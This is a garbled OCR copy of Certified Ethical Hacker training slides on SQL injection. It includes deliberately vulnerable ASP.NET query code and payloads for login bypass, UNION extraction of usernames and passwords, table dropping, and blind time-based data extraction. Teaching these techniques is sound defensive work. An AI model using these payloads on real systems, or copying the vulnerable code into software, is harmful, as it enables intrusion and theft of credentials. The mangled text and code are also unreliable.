Học viện Công Nghệ Thông Tin Bach Khoa SOL Injection © SQL Injection is the © Itisa © Most programmers are most common bsi and not a still of this ron the database or web threat Int
Trang 1Module 14
Engineered by Presented by Professionals
Certified Ethical Hacker
Trang 3Học viện Công Nghệ Thông Tin Bach Khoa
II IWIodule Objectives
SQL Injection Attacks Injection
SQL Injection Detection Password Grabbing
Evasion Technique
How to Defend Against SQL Injection
Trang 5Học viện Công Nghệ Thông Tin Bach Khoa
SOL Injection
© SQL Injection is the © Itisa © Most programmers are
most common bsi and not a still of this
ron the database or web threat Internet server issue
Œ —= 6
Trang 6, the biggest identity theft case ever prosecuted OOst
sniffer software on the companies’ servers to intercept credit L i S
Trang 7Học viện Công Nghệ Thông Tin Bach Khoa
Trang 8Học viện Công Nghệ Thông Tin Bach Khoa
© Spoofing Identity Changing Price
on the Server 9fData
Copyright © by E€-Ceeecil All Rights Reserved Reproduction is Strictly Prohibited
Trang 9SQL injection is a technique used to take advantage of non-validated
input vulnerabilities to pass SQL commands through a web application
for execution by a backend database
SQL injection is a basic attack used to either gain unauthorized access to
a database or to retrieve information directly from the database
Trang 10
§ On the basis of pli used and the way it ppliedd , SQL injection
can be used to implement the attacks mentioned below:
1 SS P.2 = Using this attack, an attacker logs onto an application
=
4
and gains administrative privileges
compromise the host OS „ obtains sensitive information that
— y is stored in the database
Attackers use this attack to delete Œ#&® web page, insert malicious content into the database information, delete web pages, or alter the contents of a
log, or audit information that is lage nies
stored in a database
ee eee | Rights Reserved Reproduction is Strictly Prohibited
Trang 12
Học viện Công Nghệ Thông Tin Bach Khoa
Powerful server-side technologies like ASP.NET and
database servers allow developers to
The power of ASP.NET and SQL can easily be ex; SOL
using SQL injection attacks Server
All relational databases, SQL Server, Oracle, IBM DB2, |
and MySQL, are susceptible to F
ee SQL injection attacks do not exploit a specific software
vulnerability, instead they that do not eS follow s for accessing and ` _ manipulating data stored in a relational database
.,
Trang 13When a user provides information and clicks Submit, the browser submits a string to the web <f rm me yi-bin/ gin server that contains the user's credentials me thod=post>
This string is visible in the body of the HTTP or Username: <input type~text
Password <input
SQL query at the database type~-password name-password>
Copyright © by | All Rights Reserved Reproduction is Strictly Prohibited
Trang 14Học viện Công Nghệ Thông Tin Bach Khoa
Example 1: Norrnal SQL, Query
c2 c2 http-//jugg@yboy.com/SadLlogin aspx BadLogin.aspx.cs
2 JugeyBoy.com
~~
System.FventArgs e) { string strcnx =
“server”
localhost ;database~rnorthwind ;vid-sa :pwd-;”"
Sqiconnection cnx * new SqlConnection (strCcnx) cnx Open() ;
//This code is susceptible to SQL injection
attacks
string strQry = "SELECT Count(*) FROM
"" AND Password='" + txtPassword.Text +
#
¬e.~
int intRecs
intRecs @ (tint) cmd.ExecuteScalar ()
SELECT Count(*) FROM Users WHERE
Server-side Code (BadLogin.aspx)
Trang 15Học viện Công Nghệ Thông Tin Bach Khoa
Code after are now comments
Copyright © by E®-Ceeecil All Rights Reserved Reproduction is Strictly Prohibited
Trang 16The user is then authenticated and redirected to the
SELECT Count(*) FROM
Users WHERE UserName='‘blah' Or i=1
AND Password=''
Because a pair of hyphens designate the beginning of a comment in SQL, the query simply becomes:
SELECT Count(*) FROM
UserName='‘blah' Or i=l
A
FROM Users WHERE UserName= 4
Copyright © by E©-Gemmcil All Rights Reserved Reproduction is Strictly Prohibited
Trang 17mw sBK ACAD
4 This page displays products
from the Northwind
to filter the resulting list of products using a textbox
private void cmdPilter Click{object sender, System.EventArgs e) ( T d Fil
adgrProducts.CurrentPageiIndex -~- 0 called txtrilter bindDataGrid(); }
private void bindDataGrid() {
agrProducts DataSource ~ createDataViews) : adgrProducts DataBind({); }
Like the previous
private DataView createDataView () {
“server localhost : videsa : pwd :database-«northwind:* this code is vulnerable to
eatring strSQL =~ “SELECT Productid, ProductName, * +
"QOuantityPerUnit, UnitPrice FROM Products” SOL injection attacks
//Thiasa code is susceptible to SQL injection attacks
txtFiiter Text Length ,
Saqiconnection cnx - new Sq1iCconnection(strCnx) -
SqibdataAdapter ada “^ new SqlDataAAdapter (strSQL, cCñnx) The executed SQL iS
from a user-supplied input
Trang 18DAI HOC
.- lesan veces mils
«ti oon peril
+ eess- eese-
i285 eer 1 đ
= ` x password, 0 from users
User names and Passwords are dinplayed
SQL Query Executed
SELECT Productid, ProductName, QuantityPerUnit, UnitPrice FROM Products WHERE
ProductName LIKE ‘blah’ UNION Select 0, username, password, O from users
Copyright © by §@-Gemecil All Rights Reserved Reproduction is Strictly Prohibited.
Trang 19Học viện Công Nghệ Thông Tin Bach Khoa
Attacker Launching SQL Injection Email Address
Your password will be sent to your registered email address
SQL Injection Vulnerable Website
Copyright © by E6-Ceancil All Rights Reserved Reproduction is Strictly Prohibted
Trang 20Attacker Launching SQL Injection Email Address
Your password will be sent to your bình INSERT INTO $b-customers (' 4b-emai Ì 4% registered email address
pasewd’.‘jb-login id tb-last name*) VALUES
(*‘ jJasonGspringficid.com he 1 1 jason jason
SQL Query Executed
SELECT jb-email, jb-passwd, jb-login_id, 3b-last_name FROM members
WHERE email = ‘blah’; INSERT INTO j3b-customers (' jb-email 3b-passwd' jb-login_id ° 1b-
last name') VALUES ('Jjason@springfield.com ‘hello jason’, ‘jason spríngfield'") ;: ' ;
Copyright © by t©-Ce@wwCdl, All Rights Reserved Reproduction is Strictily Prohibited
Trang 21Học viện Công Nghệ Thông Tin Bach Khoa
SELECT jb-email, jb-passwd, jb-login_id, jb-last_nmame FROM table WHERE jb-email =
Trang 22Học viện Công Nghệ Thông Tin Bach Khoa
Attacker Launching SQL Injection Email Address
Your password will be sent to your registered email address
Trang 24ĐẠI HỌC
STEP 6: Detailed error messages STEP 1: Check if the web
provide a wealth of information to oO
an attacker in order to execute
SQL injection
oO application connects toa
Database Server in order to access some data
STEP 5: The UNION operator is used to combine the result-set of ©
two or more SELECT
STEP 4: Try to insert a string
value where a number is expected in the input field
STEP 3: Attempt to inject codes into the input fields to
generate an error
Trang 25
Học viện Công Nghệ Thông Tin Bach Khoa
input fields to generate an error
(;), comments {( ), AND, and OR error '80040e14"
c.ccccc 1 3 [Microsoft] [ODBC SQL Server Driver] [SQL
Server)]Unclosed quotation mark before the
Microsoft OLE DB Provider for ODBC Drivers
Êsseseeososssseseesessessessssessb error '80040607' [Microsoft] [ODBC SOL
Try to insert a string value Server Driver] [SQL Server]Syntax error
in the input field column of data type int /visa/credit.aspx
Trang 26Addition, concatenate (or space in url)
(Double pipe) concatenate
Wildcard attribute indicator
?Paramiztoo&Param2=bar
@variable 8@variable
waittor delay 0:0:10"
®@version
URL Parameters
Useful as non- transactional command
Local variable
Global variable
Time delay
Displays SQL server version
Trang 27Học viện Công Nghệ Thông Tin Bach Khoa
Method 1 Function Testing wii Thing
- This testing falls within the scope of black
ma box testing, and as such, should require no © http:///US6yboy/?parameter=123
inputting massive amount of random data ev http://juggyboy/?parameter=1
and observing the changes in the output
| method aa Static/Dynamic Testing
Trang 28@ Send single quotes as the input data to 4 @ Use right square bracket (the ]
catch instances where the user input is fr ` "` character} as the input data to catch
not sanitized k Mu 3 instances where the user input ¡s used
@ Send double quotes as the input data to as part of a SQL identifier without any
catch instances where the user input is input sanitization
W@ Send long strings of single quote characters @ Send long strings of junk data, just as
(or right square brackets or double quotes) : aw you would send strings to detect buffer
@ These max out the return values from ồ "Á overruns; this action might throw SQL
REPLACE and QUOTENAME functions and ' errors on the page
might truncate the command variable used
to hold the SQL statement
Trang 29
Học viện Công Nghệ Thông Tin Bach Khoa
Testing for SOL Injection
Testing String
1' or '1'='1 value' or '1'='2 1' and '1'='2 1'or'ab-'a'+'b 1' or'ab'='a'”b
et oe) oe we
Variations
*}; [SQL Statement]; '1/1S5QL Scmament];#
14SQL Statemeet]:—
k;{SQt Statamant];#
Testing String
‘; drop table users—
ijor fata Db 1e ra» v | |
Testing String
PT isla Mea ađmin' #
Trang 30
lo 2G „7
Học viện Công Nghệ Thông Tin Bach Khoa
Testing for SOL Injection
' union select “ from users where login
"some'+'thing'
_*OR 'something'
like 'some*%"
* OR ‘whatever in (‘whatever’)
‘OR 2 BETWEEN 1 and 3
* or username like char{37];
*s EXEC (‘SEL + ‘ECT
+ortisnull<281%2F 0% 29+%2F*
*; drop table temp
Trang 33
System Stored Procedure
Attackers exploit databases’ stored procedures to perpetrate their attacks
“UNION SELECT” statement returns
the union of the intended dataset
with the target dataset
After injecting code into a
particular field, legitimate
code that follows is nullified through usage of end of line comments
SELECT Name Phone, Address
FROM Users WHERE Id-!1
ereditCardNumber,1,1 FROM
CreditCardTabic
An attacker may gain knowledge by injecting illegal/logically incorrect
requests such as injectable parameters,
data types, names of tables, etc
Injecting statements that are
always true so that queries always
return results upon evaluation ofa
WHERE condition
Trang 34Học viện Công Nghệ Thông Tin Bach Khoa
http:-//juggyboy com/page aspx?id=
[DB_NAME] Returned from the server
Union SQL Injection - Extract Table
Database Tables
http:-//juggyboy com/page aspx?id=
[EMPLOYEE TABLE] Returned from the server
¬ Union SQL Injection - Extract 1st
Field Data
http: //juggyboy com/page aspx?id=:
[FIELD 1 VALUE] Returned from the server
Trang 35
Học viện Công Nghệ Thông Tin Bach Khoa
Extract Database Name
© Syntax error converting the nvarchar value [DB
NAME]' to a column of data type int
Extract ist Table Column Name
© Syntax error converting the nvarchar value
‘[(COLUMN NAME 1]' to a column of data
type int
eal SOL Injection Error Based
Extract ist Database Table
© Syntax error converting the nvarchar value
‘TTABLE NAME 1]‘ to a column of data type int
Extract ist Field of ist Row (Data)
© Syntax error converting the nvarchar value
‘TFIELD 1 VALUE] to a column of data type int
Trang 37
asus BKkK AGAR
Blind SQL Injection is used Blind SQL injection is identical This type of attack can
when a web application is to a normal SQL Injection become time-intensive
vulnerable to an SQL except that when an attacker because a new statement
injection but the results of attempts to exploit an must be crafted for each
application rather than seeing bit recovered
a useful error message, a
generic custom page is
Trang 38ODBC Drivers error *‘80040e14"
Driver] (SQL Server] Unclosed quotation mark before the
Trang 39
WAIT FOR DELAY ‘time’ (Seconds)
This is just like sleep, wait for specified time CPU-safe way to make database wait
We are unable to process your request Please try back later
Copyright © by All Rights Reserved Reproduction is Strictly Prohibited
Trang 40Học viện Công Nghệ Thông Tin Bach Khoa
/?id=1+AND+555=if (ord (mid( (select+pass+from
users¢limit+0,1) ,1,1))=/| 97), 555,777) Searching for the second character
: “ and the first character of the first
7 (letter “a”), then
Trang 41Học viện Công Nghệ Thông Tin Bach Khoa
Check for username length
nttp://jJuggybPoy com/page aspx 71d—1 IP (LEN (OUSER)—1) WAITPOR DELAY *00:00:10'"
http: //JugqgyPoy com/page aspx 7id=1 IP (LEN (USER)=<2?) WAITPOR DELAY ‘*00:00:10'
http: // jug¢gybPoy com/page aspx?7id=1 TP (LEN (USER)=<3)} WAITPOR DELAY ‘*‘00:00:10°
ail Fe
http: //juggyboỵ com/peage aspx ?7id=} IP (ASCII (lower (substring ( (USER) 1,1))) ) WAITPOR DELAY "09:06:19"
http: // juggyboy com/peage aspz7id-1: 1V (ASCII (lower (substring( (USER) 1,.1)))- } WAITPOR OBLAY ‘00:00:10"
http: // Juggyboy com/page -aspz7id-} IP (ASCII (lower (substring ({ (USER) 1,1)))=< ) WAITFOR DELAY ‘00:00:10°*
Check if 2°° character in username contains ‘A’ (a=97), ‘B', or ‘C’ etc
7 http: //jugg¢yboỵ com/page aspx?id=1: IF (ASCII (lower (substring({ (USER) ,2,1))) ) MAITPOR DELAY *00:00:1(
http: //iuggyboỵcom/paoc a4px2?1đ=1 IF (ASC11(1cwer(substrirg( (USPFR),2,1)))* ) WAITFOR DELAY ‘00:00:i1¢
http: //juggyboy com/peage aspz? id=} IP (ASCII (lower (substring( (USER) 2,1)))- ) MAITITFOR DELAY ‘00:00:10
| ——
http: //1uggyboỵCccm/paqệ Aaspx2?1đd-1 IF (ASCII(1lower(substrtng( (USER),3,1})})~* ) MATITFGR DELAY '*00: 00: 101
` http: // juggyboy com/page aspz7id=1; IF (ASCII (lower(substring({ (TSER) ,3,1)))- ) MATTFCOH DELAY ‘00:00:10"
http: // jugqyboy com/page _ aspx ?id=1 IP «ASCII (lower (substring ( (USER) ,3,1)))-= } WAITPOR DELAY ‘0O0:00:10*
Copyright © by E©-Ceesecil All Rights Reserved Reproduction is Strictly Prohibited